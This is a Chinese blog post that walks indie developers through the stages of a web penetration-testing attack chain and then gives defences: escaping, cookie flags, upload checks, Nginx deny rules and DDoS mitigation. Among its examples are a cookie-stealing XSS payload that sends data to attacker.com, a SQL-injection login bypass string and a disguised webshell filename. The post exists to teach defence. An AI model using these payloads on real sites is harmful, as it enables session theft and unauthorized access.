

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Ling">
  <meta name="keywords" content="">
  
    <meta name="description" content="攻击链 知己知彼，方能百战不殆。作为独立开发者，了解攻击者的攻击流程对于网站的防御至关重要。  整个渗透测试的攻击流程，可以理解为一条从“外部未知”到“内部控制”的完整攻击链，通常遵循以下几个标准阶段。对于独立开发者来说，理解这个链条，就能知道在哪个环节设防最有效。 第一阶段：信息收集——攻击开始前的“踩点” 在真正动手之前，攻击者会像侦探一样，尽可能多地收集公开信息。 他们会先确定你的网站域名，">
<meta property="og:type" content="article">
<meta property="og:title" content="渗透测试">
<meta property="og:url" content="https://hermes37.vercel.app/2026/04/03/%E5%85%A8%E6%A0%88%E5%BA%94%E7%94%A8%E5%BC%80%E5%8F%91/%E8%BF%90%E7%BB%B4/%E5%AE%89%E5%85%A8%E6%9C%8D%E5%8A%A1/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">
<meta property="og:site_name" content="Hermes">
<meta property="og:description" content="攻击链 知己知彼，方能百战不殆。作为独立开发者，了解攻击者的攻击流程对于网站的防御至关重要。  整个渗透测试的攻击流程，可以理解为一条从“外部未知”到“内部控制”的完整攻击链，通常遵循以下几个标准阶段。对于独立开发者来说，理解这个链条，就能知道在哪个环节设防最有效。 第一阶段：信息收集——攻击开始前的“踩点” 在真正动手之前，攻击者会像侦探一样，尽可能多地收集公开信息。 他们会先确定你的网站域名，">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2026-04-03T08:32:33.991Z">
<meta property="article:modified_time" content="2026-04-06T09:42:43.761Z">
<meta property="article:author" content="Ling">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>渗透测试 - Hermes</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/custom.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"hermes37.vercel.app","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":"ture","follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"7a4M5yfyGptX0OG18qvJppXQ-gzGzoHsz","app_key":"y6dZFtA8I8Lg1KVhHbujblfB","server_url":"https://7a4m5yfy.lc-cn-n1-shared.com","path":"window.location.pathname","ignore_local":true}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  
    <!-- Google tag (gtag.js) -->
    <script async>
      if (!Fluid.ctx.dnt) {
        Fluid.utils.createScript("https://www.googletagmanager.com/gtag/js?id=", function() {
          window.dataLayer = window.dataLayer || [];
          function gtag() {
            dataLayer.push(arguments);
          }
          gtag('js', new Date());
          gtag('config', '');
        });
      }
    </script>
  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Fluid</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="渗透测试"></span>
          
        </div>

        
          
  <div class="mt-3">
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.8k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          33 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">渗透测试</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="攻击链"><a href="#攻击链" class="headerlink" title="攻击链"></a><strong>攻击链</strong></h1><blockquote>
<p>知己知彼，方能百战不殆。作为独立开发者，了解攻击者的攻击流程对于网站的防御至关重要。</p>
</blockquote>
<p>整个渗透测试的攻击流程，可以理解为一条从“外部未知”到“内部控制”的完整攻击链，通常遵循以下几个标准阶段。对于独立开发者来说，理解这个链条，就能知道在哪个环节设防最有效。</p>
<p><strong>第一阶段：信息收集——攻击开始前的“踩点”</strong></p>
<p>在真正动手之前，攻击者会像侦探一样，尽可能多地收集公开信息。</p>
<p>他们会先确定你的网站域名，然后通过DNS查询找出服务器IP地址。接着会用Nmap等工具扫描这个IP，看看你开放了哪些端口（比如22端口的SSH、80端口的HTTP、443端口的HTTPS、3306端口的MySQL）。</p>
<p>同时，他们会访问你的网站，查看前端代码、HTTP响应头，从中推断你的技术栈（比如用的是Nginx还是Apache，PHP还是Node.js）。</p>
<p>他们还会在GitHub上搜索你的域名或项目名，看看有没有程序员不小心把数据库密码或API密钥提交到公开仓库。如果运气好，甚至能通过Google搜索找到你泄露的敏感文件，比如<code>site:yourdomain.com ext:sql</code>或<code>ext:log</code>。这个阶段的目标就是描绘出你的网络轮廓，找到所有可能被利用的入口点。</p>
<table>
<thead>
<tr>
<th align="left">概念</th>
<th align="left">是什么</th>
<th align="left">应对措施</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><strong>端口扫描</strong></td>
<td align="left">探测你的服务器开放了哪些端口（22 SSH、80 HTTP、443 HTTPS、3306 MySQL等）</td>
<td align="left">需要知道。检查自己是否暴露了不该暴露的端口（如 3306 对外网开放）</td>
</tr>
<tr>
<td align="left"><strong>漏洞扫描</strong></td>
<td align="left">用工具自动检测已知漏洞（如过期的 Nginx 版本、有漏洞的库）</td>
<td align="left">建议用免费工具跑一遍（如 Nikto、Nmap 的 vuln 脚本）</td>
</tr>
<tr>
<td align="left"><strong>抓包分析</strong></td>
<td align="left">拦截并查看 HTTP 请求&#x2F;响应内容</td>
<td align="left">需要会。用 Chrome DevTools 的 Network 面板就够了，了解敏感数据是否明文传输</td>
</tr>
</tbody></table>
<p><strong>第二阶段：漏洞探测——寻找第一块多米诺骨牌</strong></p>
<p>有了目标信息后，攻击者开始系统地寻找漏洞。他们会用专门的安全工具扫描你的网站，寻找已知的Web漏洞，比如SQL注入点、XSS注入点、文件上传点。</p>
<p>对于你使用的第三方库和框架，他们会检查版本号，然后去国家漏洞数据库（NVD）搜索这个版本有没有公开的已知漏洞。他们还会尝试访问一些敏感路径，比如<code>/admin</code>、<code>/phpmyadmin</code>、<code>/.env</code>、<code>/backup.zip</code>。</p>
<p>如果网站有登录功能，他们会尝试SQL注入绕过（输入<code>&#39; or &#39;1&#39;=&#39;1</code>作为密码）或暴力破解弱口令。这个阶段的目标是找到任何一个可以突破的薄弱环节。</p>
<p><strong>第三阶段：漏洞利用——撬开第一道门</strong></p>
<p>一旦发现确认可利用的漏洞，攻击者就会发起实际攻击。</p>
<p>如果是SQL注入，他们可能直接用<code>sqlmap</code>工具拖出整个数据库，拿到所有用户信息和密码哈希。</p>
<p>如果是文件上传漏洞，他们会尝试上传一个Webshell（比如<code>shell.php</code>），然后通过浏览器访问这个文件，在服务器上执行任意命令。如果是XSS漏洞，他们会构造一段恶意脚本，比如<code>&lt;script&gt;document.location=&#39;http://attacker.com/steal?cookie=&#39;+document.cookie&lt;/script&gt;</code>，想办法让你或你的用户触发。</p>
<p>如果是信息泄露，比如找到了<code>.env</code>文件，他们会直接用里面泄露的数据库密码远程连接你的数据库。这个阶段的目标是获得对服务器或数据的初步控制权。</p>
<p><strong>第四阶段：权限维持——装上“后门”防止被踢</strong></p>
<p>拿到初步权限后，攻击者知道管理员可能很快就会发现并修复漏洞，所以他们会想办法留个“后门”，确保下次还能进来。</p>
<p>常见的手段包括：在你的服务器上创建一个隐藏的、有最高权限的后门账号；在定时任务（crontab）里写入一个反向连接的脚本，每隔几分钟自动连接攻击者的服务器；</p>
<p>在Web目录里隐藏一个Webshell，并给它起一个迷惑性的名字，比如<code>images/avatar.jpg.php</code>。更高级的做法是修改系统文件或内核模块，但独立开发者遇到的攻击通常不会到这个级别。这个阶段的目标是建立持久化控制，即使你删除了原来的漏洞文件，攻击者依然能回来。</p>
<p><strong>第五阶段：横向移动与提权——从“小兵”变成“将军”</strong></p>
<p>如果攻击者一开始拿到的只是一台普通Web服务器的权限，他们不会满足。他们会尝试扩大战果，也就是“提权”和“横向移动”。</p>
<p>所谓提权，就是从普通用户（比如Web服务运行的用户<code>www-data</code>）提升到系统管理员（root）。他们可能会寻找系统里配置错误、有SUID权限的程序，或者利用内核漏洞来提权。所谓横向移动，就是从这台Web服务器跳转到同一网络下的其他服务器，比如数据库服务器、缓存服务器。</p>
<p>他们可能在Web服务器上找到了数据库的连接密码，然后用这个密码去连接数据库服务器，从而拿到更核心的用户数据。如果你的整个应用都部署在同一台服务器上（很多独立开发者就是这样做的），这一步就省了，因为他们已经拿到了全部。这个阶段的目标是控制尽可能多的机器，并获取最高权限。</p>
<p><strong>第六阶段：数据窃取与破坏——最终目的达成</strong></p>
<p>到了最后一步，攻击者会达成他们的真实目的。</p>
<p>如果是窃取数据，他们会打包下载数据库（用户信息、订单记录），或者在文件系统中寻找敏感文档（密钥文件、配置文件），然后压缩、分块、加密，通过DNS隧道、HTTP隐蔽通道等方式悄悄传走。</p>
<p>如果是勒索破坏，他们会加密你的数据库和文件，然后留下勒索信。如果是用于挖矿，他们会安装挖矿程序，消耗你的CPU资源。</p>
<p>如果是SEO污染或钓鱼，他们会在你的网站上插入黑链或伪造的登录页面。这个阶段的目标已经不再是技术挑战，而是直接的经济或政治利益。</p>
<hr>
<p>一条完整的攻击链<strong>信息收集</strong> → <strong>漏洞探测</strong> → <strong>漏洞利用</strong> → <strong>权限维持</strong> → <strong>横向移动与提权</strong> → <strong>数据窃取与破坏</strong></p>
<p>对于独立开发者来说，<strong>最关键的防御点在前三个阶段</strong>：</p>
<ul>
<li><strong>信息收集阶段</strong>：不要泄露敏感信息（.env、备份文件、调试信息）</li>
<li><strong>漏洞探测阶段</strong>：及时更新依赖库，关闭不必要的端口和服务</li>
<li><strong>漏洞利用阶段</strong>：做好鉴权、输入过滤、文件类型校验</li>
</ul>
<p>如果应用能防住前三个阶段，绝大多数脚本小子和自动化攻击工具就已经被挡在门外了。</p>
<h1 id="常见攻击方式"><a href="#常见攻击方式" class="headerlink" title="常见攻击方式"></a>常见攻击方式</h1><p>根据攻击目标的不同，可以把攻击分为四大类：</p>
<table>
<thead>
<tr>
<th align="left">大类</th>
<th align="left">攻击目标</th>
<th align="left">典型攻击方式</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><strong>应用层攻击</strong></td>
<td align="left">Web 应用代码逻辑</td>
<td align="left">SQL注入、XSS、CSRF、SSRF、XXE</td>
</tr>
<tr>
<td align="left"><strong>身份与访问攻击</strong></td>
<td align="left">用户账号、权限体系</td>
<td align="left">暴力破解、撞库、会话劫持、JWT伪造、越权</td>
</tr>
<tr>
<td align="left"><strong>网络与基础设施攻击</strong></td>
<td align="left">服务器、带宽、网络设备</td>
<td align="left">DDoS、中间人攻击、DNS劫持、端口扫描</td>
</tr>
<tr>
<td align="left"><strong>供应链与依赖攻击</strong></td>
<td align="left">第三方库、开源组件、CI&#x2F;CD</td>
<td align="left">依赖库投毒、镜像劫持、构建流程篡改</td>
</tr>
</tbody></table>
<p>作为独立开发者，在开发过程中就要留意一些安全问题，尽量避免出现问题交给运维处理：</p>
<ul>
<li><p><strong>SQL 注入</strong>：确认自己用了参数化查询或 ORM，尽量少<strong>拼接字符串</strong></p>
</li>
<li><p><strong>XSS</strong>：确认用户输入的内容展示时做了转义【输出时进行 HTML 转义 + 设置 Cookie HttpOnly】</p>
</li>
</ul>
<p><strong>各框架内置转义：</strong></p>
<table>
<thead>
<tr>
<th align="left">框架</th>
<th align="left">默认行为</th>
<th align="left">注意事项</th>
</tr>
</thead>
<tbody><tr>
<td align="left">React</td>
<td align="left">JSX 自动转义</td>
<td align="left">不要用 <code>dangerouslySetInnerHTML</code></td>
</tr>
<tr>
<td align="left">Vue</td>
<td align="left">模板自动转义</td>
<td align="left">不要用 <code>v-html</code></td>
</tr>
<tr>
<td align="left">Angular</td>
<td align="left">自动转义</td>
<td align="left">不要用 <code>[innerHTML]</code></td>
</tr>
<tr>
<td align="left">Django</td>
<td align="left">模板自动转义</td>
<td align="left">用 <code>&#123;&#123; variable &#125;&#125;</code> 安全，&#96;</td>
</tr>
<tr>
<td align="left">Jinja2</td>
<td align="left">默认转义</td>
<td align="left">用 <code>&#123;&#123; variable &#125;&#125;</code> 安全</td>
</tr>
</tbody></table>
<p><strong>设置 Cookie HttpOnly（防止 JS 读取 Cookie）</strong>：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># Python/Flask</span><br>response.set_cookie(<span class="hljs-string">&#x27;session_id&#x27;</span>, value, httponly=<span class="hljs-literal">True</span>, secure=<span class="hljs-literal">True</span>, samesite=<span class="hljs-string">&#x27;Lax&#x27;</span>)<br></code></pre></td></tr></table></figure>

<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs javascript"><span class="hljs-comment">// Node.js/Express</span><br>res.<span class="hljs-title function_">cookie</span>(<span class="hljs-string">&#x27;session_id&#x27;</span>, token, &#123; <span class="hljs-attr">httpOnly</span>: <span class="hljs-literal">true</span>, <span class="hljs-attr">secure</span>: <span class="hljs-literal">true</span>, <span class="hljs-attr">sameSite</span>: <span class="hljs-string">&#x27;lax&#x27;</span> &#125;);<br></code></pre></td></tr></table></figure>

<hr>
<ul>
<li><strong>CSRF</strong>：确认关键操作（修改密码、删除数据、转账）有额外校验【关键操作增加 CSRF Token 或 SameSite Cookie】</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># 这里比如：设置 Cookie SameSite（现代浏览器）</span><br>response.set_cookie(<span class="hljs-string">&#x27;session_id&#x27;</span>, value, samesite=<span class="hljs-string">&#x27;Lax&#x27;</span>)<br></code></pre></td></tr></table></figure>

<table>
<thead>
<tr>
<th align="left">SameSite 值</th>
<th align="left">效果</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><code>Strict</code></td>
<td align="left">完全禁止跨站携带 Cookie（最安全，但可能影响正常跳转）</td>
</tr>
<tr>
<td align="left"><code>Lax</code></td>
<td align="left">允许从外部链接跳转进来时携带（推荐，平衡安全和体验）</td>
</tr>
<tr>
<td align="left"><code>None</code></td>
<td align="left">允许跨站携带（必须配合 <code>Secure</code>）</td>
</tr>
</tbody></table>
<hr>
<ul>
<li><strong>文件上传</strong>：如果允许上传，确认文件类型被严格限制（多层限制 + 重命名 + 隔离存储）</li>
</ul>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-comment">#简单示例：</span><br><span class="hljs-keyword">import</span> magic<br><br>ALLOWED_EXTENSIONS = &#123;<span class="hljs-string">&#x27;jpg&#x27;</span>, <span class="hljs-string">&#x27;png&#x27;</span>, <span class="hljs-string">&#x27;gif&#x27;</span>, <span class="hljs-string">&#x27;pdf&#x27;</span>&#125;<br>MAX_FILE_SIZE = <span class="hljs-number">5</span> * <span class="hljs-number">1024</span> * <span class="hljs-number">1024</span>  <span class="hljs-comment"># 5MB</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">safe_upload</span>(<span class="hljs-params">file</span>):<br>    <span class="hljs-comment"># 1. 检查文件大小</span><br>    <span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(file.read()) &gt; MAX_FILE_SIZE:<br>        <span class="hljs-keyword">raise</span> Exception(<span class="hljs-string">&quot;文件过大&quot;</span>)<br>    <br>    <span class="hljs-comment"># 2. 检查扩展名（白名单）</span><br>    ext = file.filename.rsplit(<span class="hljs-string">&#x27;.&#x27;</span>, <span class="hljs-number">1</span>)[<span class="hljs-number">1</span>].lower()<br>    <span class="hljs-keyword">if</span> ext <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> ALLOWED_EXTENSIONS:<br>        <span class="hljs-keyword">raise</span> Exception(<span class="hljs-string">&quot;不允许的文件类型&quot;</span>)<br>    <br>    <span class="hljs-comment"># 3. 检查真实文件类型（MIME，防止改后缀）</span><br>    mime = magic.from_buffer(file.read(<span class="hljs-number">1024</span>), mime=<span class="hljs-literal">True</span>)<br>    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> mime.startswith(<span class="hljs-string">&#x27;image/&#x27;</span>):<br>        <span class="hljs-keyword">raise</span> Exception(<span class="hljs-string">&quot;不是有效的图片&quot;</span>)<br>    <br>    <span class="hljs-comment"># 4. 重命名（避免路径遍历攻击）</span><br>    new_filename = uuid.uuid4().<span class="hljs-built_in">hex</span> + <span class="hljs-string">&#x27;.&#x27;</span> + ext<br>    <br>    <span class="hljs-comment"># 5. 保存到对象存储（推荐）或 Web 不可执行目录</span><br>    <span class="hljs-comment"># 方案A：保存到 AWS S3 / Cloudflare R2</span><br>    s3.upload_fileobj(file, <span class="hljs-string">&#x27;my-bucket&#x27;</span>, new_filename)<br>    <br>    <span class="hljs-comment"># 方案B：保存到本地但禁止脚本执行</span><br>    <span class="hljs-comment"># 配置 Nginx 使 uploads/ 目录不解析 PHP/Py</span><br>    <span class="hljs-keyword">return</span> new_filename<br></code></pre></td></tr></table></figure>

<ul>
<li><p><strong>登录接口</strong>：确认有频率限制，错误信息不暴露用户是否存在【频率限制 + 统一错误信息 + 验证码】</p>
</li>
<li><p><strong>敏感信息</strong>：确认没有 <code>.env</code>、<code>*.log</code>、<code>*.sql</code> 暴露在公网【环境变量 + 文件权限 + 访问控制】</p>
</li>
</ul>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-comment">#比如：**Nginx 禁止访问敏感文件</span><br><span class="hljs-section">location</span> <span class="hljs-regexp">~ /\.env$</span> &#123;<br>    <span class="hljs-attribute">return</span> <span class="hljs-number">404</span>;<br>&#125;<br><span class="hljs-section">location</span> <span class="hljs-regexp">~ \.(log|sql|sqlite)$</span> &#123;<br>    <span class="hljs-attribute">return</span> <span class="hljs-number">404</span>;<br>&#125;<br><span class="hljs-section">location</span> <span class="hljs-regexp">~ /\.git</span> &#123;<br>    <span class="hljs-attribute">deny</span> all;<br>&#125;<br></code></pre></td></tr></table></figure>

<ul>
<li><strong>依赖漏洞</strong>：运行 <code>npm audit</code> 或 <code>pip-audit</code> 检查第三方库【定期运行审计工具 + 自动更新】</li>
</ul>
<p>同时注意DDoS，攻击者控制成千上万台被感染的机器（僵尸网络），同时向服务器发送海量请求，耗尽服务器的带宽、CPU、连接数或应用资源，导致正常用户无法访问。</p>
<table>
<thead>
<tr>
<th align="left">类型</th>
<th align="left">攻击目标</th>
<th align="left">攻击方式</th>
<th align="left">典型特征</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><strong>流量型攻击</strong></td>
<td align="left">网络带宽</td>
<td align="left">UDP反射放大、NTP放大、DNS放大</td>
<td align="left">把小请求放大几十倍甚至几百倍，塞满带宽</td>
</tr>
<tr>
<td align="left"><strong>连接型攻击</strong></td>
<td align="left">服务器连接数</td>
<td align="left">SYN Flood、ACK Flood</td>
<td align="left">不断发半连接请求，耗尽连接池</td>
</tr>
<tr>
<td align="left"><strong>应用层攻击</strong></td>
<td align="left">CPU&#x2F;数据库</td>
<td align="left">HTTP Flood、慢速攻击（Slowloris）</td>
<td align="left">发起看似正常的HTTP请求，但每个请求都消耗大量CPU</td>
</tr>
</tbody></table>
<p><strong>现实情况</strong>是独立开发者无法靠自己的单台服务器防御 DDoS，因为攻击者的带宽可能是个人的几百倍。</p>
<p>所以<strong>不要把服务器直接暴露在公网上</strong>，而是让专业的云服务商帮你扛流量。比如使用 CDN（Cloudflare 免费版）或者使用云厂商的高防 IP（被攻击时临时开启）</p>
<table>
<thead>
<tr>
<th align="left">防御层次</th>
<th align="left">具体措施</th>
<th align="left">成本</th>
<th align="left">效果</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><strong>第一层：CDN 兜底</strong></td>
<td align="left">套 Cloudflare 免费版</td>
<td align="left">免费</td>
<td align="left">扛住大部分中小型 DDoS</td>
</tr>
<tr>
<td align="left"><strong>第二层：限流+封禁</strong></td>
<td align="left">Nginx 限流 + Fail2ban</td>
<td align="left">免费</td>
<td align="left">防脚本小子、慢速攻击</td>
</tr>
<tr>
<td align="left"><strong>第三层：系统优化</strong></td>
<td align="left">SYN Cookie、连接队列</td>
<td align="left">免费</td>
<td align="left">提升抗压能力</td>
</tr>
<tr>
<td align="left"><strong>第四层：临时高防</strong></td>
<td align="left">按需购买云高防 IP</td>
<td align="left">按天&#x2F;月付费</td>
<td align="left">扛大流量（被打再开）</td>
</tr>
<tr>
<td align="left"><strong>第五层：架构优化</strong></td>
<td align="left">静态文件走 CDN，动态请求无状态化，便于水平扩容</td>
<td align="left">开发成本</td>
<td align="left">提升整体承载能力</td>
</tr>
</tbody></table>
<h1 id="鉴权"><a href="#鉴权" class="headerlink" title="鉴权"></a>鉴权</h1><p><strong>渗透测试的核心目标之一，就是绕过或破解鉴权机制。</strong>所以有必要了解一些鉴权知识。</p>
<p>先分清三个容易混淆的词：</p>
<table>
<thead>
<tr>
<th align="left">概念</th>
<th align="left">英文</th>
<th align="left">是什么</th>
<th align="left">通俗理解</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><strong>认证</strong></td>
<td align="left">Authentication</td>
<td align="left">验证你是谁</td>
<td align="left">出示身份证（登录、人脸识别）</td>
</tr>
<tr>
<td align="left"><strong>授权</strong></td>
<td align="left">Authorization</td>
<td align="left">验证你能干什么</td>
<td align="left">你的工牌能进哪些房间（普通用户 vs 管理员）</td>
</tr>
<tr>
<td align="left"><strong>鉴权</strong></td>
<td align="left">两者合称</td>
<td align="left">认证 + 授权</td>
<td align="left">先确认你是谁，再确认你能做什么</td>
</tr>
</tbody></table>
<p>如果只做了认证（用户登录了），没做授权（登录后能访问所有人的数据）。结果用户A改个URL里的ID就能看到用户B的订单。</p>
<p><strong>常见鉴权方案：</strong></p>
<table>
<thead>
<tr>
<th align="left">方案</th>
<th align="left">原理</th>
<th align="left">适合场景</th>
<th align="left">独立开发者推荐度</th>
</tr>
</thead>
<tbody><tr>
<td align="left"><strong>Session&#x2F;Cookie</strong></td>
<td align="left">服务器存 session，浏览器存 cookie</td>
<td align="left">传统 Web 应用（如 Laravel、Rails）</td>
<td align="left">适合纯 Web</td>
</tr>
<tr>
<td align="left"><strong>JWT</strong>（JSON Web Token）</td>
<td align="left">服务器不存状态，token 自带用户信息</td>
<td align="left">分布式系统、移动 APP、前后端分离</td>
<td align="left">适合 SPA&#x2F;APP</td>
</tr>
<tr>
<td align="left"><strong>OAuth 2.0</strong></td>
<td align="left">第三方登录（用 Google&#x2F;GitHub 登录）</td>
<td align="left">不想自己管密码、需要第三方授权</td>
<td align="left">强烈推荐</td>
</tr>
<tr>
<td align="left"><strong>API Key</strong></td>
<td align="left">给第三方调用者一个固定密钥</td>
<td align="left">开放 API、服务间调用</td>
<td align="left">只能用于机器对机器</td>
</tr>
<tr>
<td align="left"><strong>Basic Auth</strong></td>
<td align="left">每次请求带用户名:密码（Base64编码）</td>
<td align="left">内部工具、简单测试</td>
<td align="left">生产环境不推荐（必须配合 HTTPS）</td>
</tr>
</tbody></table>
<h3 id="Session-Cookie"><a href="#Session-Cookie" class="headerlink" title="Session&#x2F;Cookie"></a>Session&#x2F;Cookie</h3><figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">用户登录 → 服务器生成 session_id → 存在 Cookie 返回浏览器<br>下次请求 → 浏览器自动带 Cookie → 服务器查 <span class="hljs-keyword">session</span> 确认身份<br></code></pre></td></tr></table></figure>

<p><strong>优点</strong>是成熟、可控、可以主动注销，但需要服务器存 session（内存或 Redis），不适合水平扩展</p>
<h3 id="JWT"><a href="#JWT" class="headerlink" title="JWT"></a>JWT</h3><figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs mipsasm">用户登录 → 服务器生成 <span class="hljs-keyword">JWT（内含用户ID、过期时间）→ </span>返回给客户端<br>客户端存 <span class="hljs-keyword">JWT（localStorage </span>或 Cookie）→ 每次请求带在 Header 里<br>服务器验签 → 直接从 <span class="hljs-keyword">JWT </span>读出用户身份（无需查数据库）<br></code></pre></td></tr></table></figure>

